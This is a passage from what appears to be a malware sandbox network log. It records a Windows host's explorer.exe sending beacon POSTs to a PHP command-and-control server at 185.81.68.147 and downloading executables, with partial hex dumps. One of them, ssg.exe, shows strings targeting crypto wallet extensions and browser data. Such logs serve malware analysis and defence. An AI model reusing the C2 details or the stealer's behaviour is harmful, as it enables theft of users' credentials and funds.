Dec 13, 2024 01:37:36.236077070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.236100912 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.236108065 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236119986 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236121893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.236129045 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236144066 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.236212969 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236227036 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236236095 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236242056 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236248970 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236255884 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236316919 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.236346960 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236355066 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236411095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.236426115 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.236495018 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236504078 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236510038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.236510992 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236520052 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236625910 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.236641884 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.236668110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.236685991 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236690044 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.236694098 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236702919 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236711025 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236711979 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.236718893 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236726046 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236733913 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236742020 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236748934 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236756086 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236763954 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236772060 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236779928 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236788988 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236795902 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236804008 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236812115 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236819029 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236826897 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236835003 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236843109 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.236850023 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.237060070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.237076998 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.237076998 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.237107038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.237118006 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.237147093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.237160921 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.237184048 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.237185955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.237194061 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.237201929 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.237206936 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.237251043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.237265110 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.237293959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.237308025 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.237333059 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.237343073 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.237351894 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.237446070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.237464905 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.237483025 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.237487078 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.237497091 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.237504005 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.237510920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.237513065 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.237541914 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.237601995 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.237611055 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.237617970 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.237626076 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.237624884 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.237639904 CET	80	49775	185.81.68.147	192.168.2.5

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:00.295267105 CET	259	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Dec 13, 2024 01:37:01.625020981 CET	257	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:00 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 40 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 38 37 66 36 62 30 35 38 63 36 37 34 34 65 63 65 64 30 65 63 63 36 33 36 66 34 64 36 30 36 34 33 64 65 30 35 31 35 33 63 Data Ascii: 87f6b058c6744eced0ecc636f4d60643de05153c

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:01.747220993 CET	279	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 37
Dec 13, 2024 01:37:01.868757963 CET	37	OUT	Data Raw: 5a 58 12 4a 50 1e 04 44 52 06 4b 04 48 55 1f 55 18 71 29 25 2c 78 60 1b 36 77 18 57 5c 50 5b 5d 17 19 01 49 08 Data Ascii: ZXJPDRKHUUq)%,x`6wW\P[]I
Dec 13, 2024 01:37:03.409686089 CET	216	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:02 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:03.532355070 CET	278	OUT	POST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 13, 2024 01:37:03.652638912 CET	6	OUT	Data Raw: 48 5e 08 51 Data Ascii: H^Q
Dec 13, 2024 01:37:04.993227959 CET	349	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:04 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 131 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 4b 0e 42 16 40 0f 17 4c 07 0f 01 1a 5d 52 4b 52 08 4b 52 57 01 1c 55 12 4c 4a 53 48 53 39 39 54 19 58 41 45 45 09 4c 17 06 5e 03 4c 08 04 16 55 0e 19 05 00 52 4c 16 17 57 4b 06 1b 53 3e 3c 57 48 0c 42 44 46 0e 1c 4b 54 08 00 1f 0d 02 4d 0e 0f 48 07 56 07 1a 4d 13 52 56 40 51 4b 06 1d 01 3d 6f 53 1f 5e 47 42 16 0e 4b 19 01 0e 01 1d 5c 54 1e 03 09 1b 02 57 0f 18 01 50 1a 1e 50 40 06 3b 3d Data Ascii: KB@L]RKRKRWULJSHS99TXAEEL^LURLWKS><WHBDFKTMHVMRV@QK=oS^GBK\TWPP@;=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:05.127501965 CET	232	OUT	GET /ctx.exe HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Dec 13, 2024 01:37:06.461503029 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Tue, 10 Dec 2024 15:45:48 GMT ETag: "5a452c-628ec5ffff268" Accept-Ranges: bytes Content-Length: 5915948 Connection: close Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 2c 62 58 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 2a 4f [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$XhcXhcXhc`_hcfhcgRhc[hc`QhcgIhcfphcbShcXhbhcKgAhcKaYhcRichXhcPEd,bXg"(X@*OZ`lx`"h@P.text `.rdataB&(@@.datas@.pdata"`$@@.rsrc@@.reloch@B
Dec 13, 2024 01:37:06.461520910 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: H(/H'HHHHHH($HqCH\$Hl$ LD$VWATAUAWH H3HDIHA.L
Dec 13, 2024 01:37:06.461905956 CET	1236	IN	Data Raw: 48 85 c0 75 15 48 8d 56 12 48 8d 0d da a7 02 00 e8 4d 15 00 00 e9 02 01 00 00 8b 56 04 45 33 c0 48 03 93 00 10 00 00 49 8b cc e8 37 e9 00 00 85 c0 79 1c 4c 8d 46 12 48 8d 15 e4 a7 02 00 48 8d 0d 19 a8 02 00 e8 88 16 00 00 e9 af 00 00 00 8b 4e 0c Data Ascii: HuHVHMVE3HI7yLFHHN0LHu DNLFHHX~uME3HIW^Lt$PMHt; DH;HMAHGIH^HrhL H+uH\|$`Lt$Pt
Dec 13, 2024 01:37:06.461925030 CET	1236	IN	Data Raw: 48 48 8b 6c 24 40 4c 8b 64 24 50 85 c0 74 0b 49 8b ce e8 e3 2b 01 00 45 33 f6 49 8b cf e8 e8 dd 00 00 48 8b 5c 24 58 49 8b c6 48 83 c4 20 41 5f 41 5e 5e c3 4c 8d 46 12 48 8d 15 57 a2 02 00 48 8d 0d 84 a2 02 00 e8 b3 11 00 00 b8 ff ff ff ff eb aa Data Ascii: HHl$@Ld$PtI+E3IH\$XIH A_A^^LFHWH@SWH8znHHu$xyHWH_H8_[HnLd$`Ie)LHu(LGHRH6Ld$`H8_[H2L\|$ H!)LH
Dec 13, 2024 01:37:06.461945057 CET	1236	IN	Data Raw: 2c 4c 8d 05 ee 9f 02 00 0f c8 89 44 24 2c ba 40 00 00 00 8b 44 24 30 0f c8 89 44 24 30 8b 44 24 34 0f c8 89 44 24 34 89 83 1c 10 00 00 e8 88 01 00 00 8b 44 24 28 45 33 c0 48 2b f0 48 8b cf 48 8d 46 58 48 89 83 00 10 00 00 8b 54 24 2c 48 03 d0 e8 Data Ascii: ,LD$,@D$0D$0D$4D$4D$(E3H+HHFXHT$,HhL$0&HHuHHeT$0LAHHsH}HJyD$0HHH*tHgHH;
Dec 13, 2024 01:37:06.462086916 CET	1236	IN	Data Raw: 50 20 00 00 48 8b 8f 28 20 00 00 ba 72 01 00 00 41 b8 01 00 00 00 ff 15 1a 95 02 00 4c 8b 87 48 20 00 00 4d 85 c0 74 72 48 8b 4f 08 ba 30 00 00 00 41 b9 01 00 00 00 ff 15 f9 94 02 00 4c 8b 87 48 20 00 00 41 b9 01 00 00 00 48 8b 8f 30 20 00 00 ba Data Ascii: P H( rALH MtrHO0ALH AH0 0LH AH8 0LH AH@ 0H0 LO(E3LO E3H8 jHOHT$`tDD$lHT$hfD+D$d
Dec 13, 2024 01:37:06.462104082 CET	1236	IN	Data Raw: 24 50 4c 8d 0d 49 fc ff ff 48 8d 44 24 30 45 33 c0 48 8d 95 a0 1f 00 00 48 89 44 24 20 48 8b cf ff 15 2c 90 02 00 48 8b 4c 24 40 48 8b d8 e8 4b 1d 01 00 48 8b 4c 24 48 e8 41 1d 01 00 48 8b 4c 24 50 e8 37 1d 01 00 48 8b 8d 78 1f 00 00 48 85 c9 74 Data Ascii: $PLIHD$0E3HHD$ H,HL$@HKHL$HAHL$P7HxHtHHtH H3H!A^_^[]H\$Hl$Ht$H\|$ AVH 3IHDHtE33bHHtE33HaLHtE33HaH
Dec 13, 2024 01:37:06.462121010 CET	1236	IN	Data Raw: 24 30 4c 8b cb 48 c7 44 24 20 00 00 00 00 41 b8 00 04 00 00 48 8b 08 48 83 c9 02 e8 d2 13 01 00 41 b8 00 04 00 00 48 8d 94 24 30 04 00 00 48 8d 4c 24 30 e8 c6 5d 00 00 33 c9 41 b9 30 00 00 00 48 85 c0 74 17 4c 8d 05 52 93 02 00 48 8d 94 24 30 04 Data Ascii: $0LHD$ AHHAH$0HL$0]3A0HtLRH$0LHT$0H$0H3@HH_[LIKISMCMK SWHHHH3H$0HI{H\|$(HT$0LHD$ AHHVA0
Dec 13, 2024 01:37:06.462136984 CET	1236	IN	Data Raw: 02 00 e8 63 f8 ff ff b8 ff ff ff ff e9 6b 01 00 00 48 89 9c 24 98 10 00 00 48 8b 9e 08 10 00 00 48 89 ac 24 a0 10 00 00 48 89 bc 24 a8 10 00 00 4c 89 b4 24 60 10 00 00 48 3b 9e 10 10 00 00 0f 83 15 01 00 00 0f 1f 44 00 00 80 7b 11 73 0f 85 eb 00 Data Ascii: ckH$HH$H$L$`H;D{sHH[HHxLsLt$(M" LD$ \HL$P=)HHL$P$H%IHLHHHSHH
Dec 13, 2024 01:37:06.462343931 CET	1236	IN	Data Raw: 48 8d 84 24 d0 00 00 00 48 8b cd 4c 8d 8c 24 d0 10 00 00 48 89 44 24 20 4c 8d 84 24 d0 20 00 00 48 8d 54 24 30 e8 bc 08 00 00 eb 40 4c 8d 47 12 48 8d 94 24 d0 10 00 00 48 8d 8c 24 d0 20 00 00 e8 61 0b 00 00 41 3b c4 48 8d b4 24 d0 10 00 00 41 0f Data Ascii: H$HL$HD$ L$ HT$0@LGH$H$ aA;H$ADL$HIu+HIHI;8H'HWHVHHwAH$ 1L$0L$0L$0H$(1H$
Dec 13, 2024 01:37:06.581523895 CET	1236	IN	Data Raw: 20 00 00 41 5e 5f 5e c3 48 8d 15 37 81 02 00 48 8d 4f 10 e8 2a 08 00 00 48 8b d8 48 85 c0 74 37 48 8b 0d 03 9c 02 00 48 8d 54 24 50 48 89 4c 24 50 41 b8 08 00 00 00 48 c1 e9 18 80 c1 0d 88 4c 24 53 48 8b c8 e8 28 3f 00 00 48 85 c0 75 22 48 8b cb Data Ascii: A^_^H7HO*HHt7HHT$PHL$PAHL$SH(?Hu"HH_HHXsHHLOLs2H\|H@uH8pkgH HHHHOxKH80HuH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49711	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 01:37:16.448924065 CET	232	OUT	GET /ssg.exe HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Dec 13, 2024 01:37:17.775022984 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 08:37:17 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 12 Dec 2024 10:50:51 GMT ETag: "4b200-629107cd804d2" Accept-Ranges: bytes Content-Length: 307712 Connection: close Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 02 03 00 4f 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH(0 @ @<O H.text `.rsrc @@.reloc@BpH (wautofill5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW
Dec 13, 2024 01:37:17.775044918 CET	224	IN	Data Raw: 39 00 6c 00 61 00 47 00 78 00 6c 00 5a 00 6d 00 35 00 72 00 62 00 32 00 52 00 69 00 5a 00 57 00 5a 00 6e 00 63 00 47 00 64 00 72 00 62 00 6d 00 35 00 38 00 54 00 57 00 56 00 30 00 59 00 57 00 31 00 68 00 63 00 32 00 73 00 4b 00 59 00 57 00 5a 00 Data Ascii: 9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW
Dec 13, 2024 01:37:17.775245905 CET	1236	IN	Data Raw: 39 00 6d 00 59 00 6d 00 52 00 6b 00 5a 00 32 00 4e 00 70 00 61 00 6d 00 35 00 74 00 61 00 47 00 35 00 6d 00 62 00 6d 00 74 00 6b 00 62 00 6d 00 46 00 68 00 5a 00 48 00 78 00 44 00 62 00 32 00 6c 00 75 00 59 00 6d 00 46 00 7a 00 5a 00 51 00 70 00 Data Ascii: 9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWht
Dec 13, 2024 01:37:17.775290966 CET	1236	IN	Data Raw: 66 00 45 00 31 00 6c 00 64 00 30 00 4e 00 34 00 43 00 6d 00 35 00 68 00 62 00 6d 00 70 00 74 00 5a 00 47 00 74 00 75 00 61 00 47 00 74 00 70 00 62 00 6d 00 6c 00 6d 00 62 00 6d 00 74 00 6e 00 5a 00 47 00 4e 00 6e 00 5a 00 32 00 4e 00 6d 00 62 00 Data Ascii: fE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybl
Dec 13, 2024 01:37:17.775302887 CET	1236	IN	Data Raw: 65 00 6e 00 74 00 56 00 65 00 72 00 73 00 53 00 6b 00 79 00 42 00 6f 00 78 00 69 00 6f 00 6e 00 f4 a7 50 51 41 65 53 7e 17 a4 c3 1a 27 5e 96 3a ab 6b cb 3b 9d 45 f1 1f fa 58 ab ac e3 03 93 4b 30 fa 55 20 76 6d f6 ad cc 76 91 88 02 4c 25 f5 e5 d7 Data Ascii: entVersSkyBoxionPQAeS~'^:k;EXK0U vmvL%O*5D&bZIg%E]/uLFk_mzRY-t!Xi)IDjuyxX>kq'O f:}Jc1Q3`SEbdwk+HhXpEl{Rs#
Dec 13, 2024 01:37:17.775430918 CET	1236	IN	Data Raw: 01 13 8a 6b 3a 91 11 41 4f 67 dc ea 97 f2 cf ce f0 b4 e6 73 96 ac 74 22 e7 ad 35 85 e2 f9 37 e8 1c 75 df 6e 47 f1 1a 71 1d 29 c5 89 6f b7 62 0e aa 18 be 1b fc 56 3e 4b c6 d2 79 20 9a db c0 fe 78 cd 5a f4 1f dd a8 33 88 07 c7 31 b1 12 10 59 27 80 Data Ascii: k:AOgst"57unGq)obV>Ky xZ31Y'_`QJ-z;M<Sa+~w&icU!}SELProcessInfoECT FRProcessInfoOM Win32_PrProcessInfoo
Dec 13, 2024 01:37:17.775441885 CET	1236	IN	Data Raw: 89 07 8e 8e a7 33 94 94 b6 2d 9b 9b 22 3c 1e 1e 92 15 87 87 20 c9 e9 e9 49 87 ce ce ff aa 55 55 78 50 28 28 7a a5 df df 8f 03 8c 8c f8 59 a1 a1 80 09 89 89 17 1a 0d 0d da 65 bf bf 31 d7 e6 e6 c6 84 42 42 b8 d0 68 68 c3 82 41 41 b0 29 99 99 77 5a Data Ascii: 3-"< IUUxP((zYe1BBhhAA)wZ--{TTm:,AppData\Local\[^\u0020-\u007F]UNKNOWNLocal StateQP~AeS:'^;kEXK 0
Dec 13, 2024 01:37:17.775464058 CET	1236	IN	Data Raw: 6f 00 6c 00 75 00 74 00 69 00 6f 00 6e 00 43 00 20 00 00 00 50 00 72 00 6f 00 63 00 65 00 73 00 73 00 49 00 64 00 00 00 00 00 00 00 31 00 2a 00 2e 00 31 00 6c 00 31 00 64 00 31 00 62 00 00 00 00 00 00 00 63 a5 c6 63 7c 84 f8 7c 77 99 ee 77 7b 8d Data Ascii: olutionC ProcessId1*.1l1d1bcc\|\|ww{{kkooT0P`0gg+}V+bMvvE@}}YYGGAg_E#Srr[u=&jL&6Zl6?A~?O4\h4Q4
Dec 13, 2024 01:37:17.775480986 CET	776	IN	Data Raw: 56 00 30 00 43 00 6d 00 46 00 70 00 61 00 57 00 5a 00 69 00 62 00 6d 00 4a 00 6d 00 62 00 32 00 4a 00 77 00 62 00 57 00 56 00 6c 00 61 00 32 00 6c 00 77 00 61 00 47 00 56 00 6c 00 61 00 57 00 70 00 70 00 62 00 57 00 52 00 77 00 62 00 6d 00 78 00 Data Ascii: V0CmFpaWZibmJmb2JwbWVla2lwaGVlaWppbWRwbmxwZ3BwfFRlcnJhU3RhdGlvbgpmbm5lZ3BobG9iamRwa2hlY2Fwa2lqamRrZ2NqaGtpYnxIYXJtb255V2Fs
Dec 13, 2024 01:37:17.775492907 CET	1236	IN	Data Raw: 39 00 6d 00 61 00 32 00 4e 00 69 00 5a 00 32 00 56 00 72 00 61 00 47 00 56 00 75 00 59 00 6d 00 68 00 38 00 54 00 33 00 68 00 35 00 5a 00 32 00 56 00 75 00 43 00 6d 00 31 00 6e 00 5a 00 6d 00 5a 00 72 00 5a 00 6d 00 4a 00 70 00 5a 00 47 00 6c 00 Data Ascii: 9ma2NiZ2VraGVuYmh8T3h5Z2VuCm1nZmZrZmJpZGloanBvYW9tYWpsYmdjaGRkbGljZ3BufFBhbGlXYWxsZXQKYW9ka2thZ25hZGNib2JmcGdnZm5qZW9uZ2Vt
Dec 13, 2024 01:37:17.894916058 CET	1236	IN	Data Raw: 68 00 6b 00 5a 00 47 00 78 00 70 00 59 00 32 00 64 00 77 00 62 00 6e 00 78 00 51 00 59 00 57 00 78 00 70 00 56 00 32 00 46 00 73 00 62 00 47 00 56 00 30 00 43 00 6d 00 46 00 76 00 5a 00 47 00 74 00 72 00 59 00 57 00 64 00 75 00 59 00 57 00 52 00 Data Ascii: hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1u

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49719	185.81.68.147	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
